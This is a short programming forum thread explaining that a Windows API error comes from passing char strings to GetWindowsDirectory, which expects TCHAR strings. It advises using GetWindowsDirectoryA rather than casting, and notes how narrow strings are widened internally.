You're using the wrong character type.

See this post:

http://v2.cplusplus.com/forum/windows/106683/

Do NOT cast around this error. It's bad bad bad. It will not work as you expect.

GetWindowsDirectory((LPSTR)windir, MAX_PATH); // <- don't do that cast!

You are using regular char strings... so you need to use the 'A' form of WinAPI functions. That is...call GetWindowsDirectoryA (note the A at the end) instead of the normal GetWindowsDirectory.

GetWindowsDirectory takes TCHAR strings. Since you are not using TCHARs you get this error.

It is more work to switch to TCHARs than it is to just use the 'A' form of the functions.
@Disch that's nice to know, I had no idea that you could mix and match the wide and regular Windows API functions.
Everything in Windows uses the wide forms interally. Using the narrow forms just widens the string data before it's used. Though how it's widened can vary (I think it's based on the user's locale settings) so it's not recommended at all if you want to support anything beyond basic ASCII text.
